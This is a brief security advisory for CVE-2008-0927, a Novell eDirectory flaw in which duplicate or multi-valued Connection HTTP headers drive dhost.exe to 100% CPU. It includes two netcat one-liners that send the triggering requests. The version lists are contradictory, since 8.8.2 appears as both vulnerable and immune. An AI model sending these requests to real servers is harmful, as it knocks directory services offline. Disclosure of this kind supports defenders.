|
|
| |
| A vulnerability in Novell's eDirectory allows Connection: HTTP headers to be used to cause dhost.exe to consume 100% of a CPU. Multiple requests submitted can comsume time on all CPUs. |
| |
Credit:
The information has been provided by Nicob.
The original article can be found at: http://www.novell.com/support/viewContent.do?externalId=3829452&sliceId=1
|
| |
Vulnerable Systems:
* Novell eDirectory version 8.8.2
* Novell eDirectory version 8.7.3.9
Immune Systems:
* Novell eDirectory version 8.7.3 sp10
* Novell eDirectory version 8.8.2
Technical details:
The dhost.exe process will consume 100% of a CPU. More than one request can be used to lock every CPU.
Two "Connection:" headers : echo "GET / HTTP/1.0"; echo "Connection: foo"; echo "Connection: bar"; echo; echo) | nc -vn 192.168.1.1 8028
One "Connection:" header with two values : (echo "GET / HTTP/1.0"; echo "Connection: foo, bar"; echo; echo) | nc -vn 192.168.1.1 8028
CVE Information:
CVE-2008-0927
|
|
|
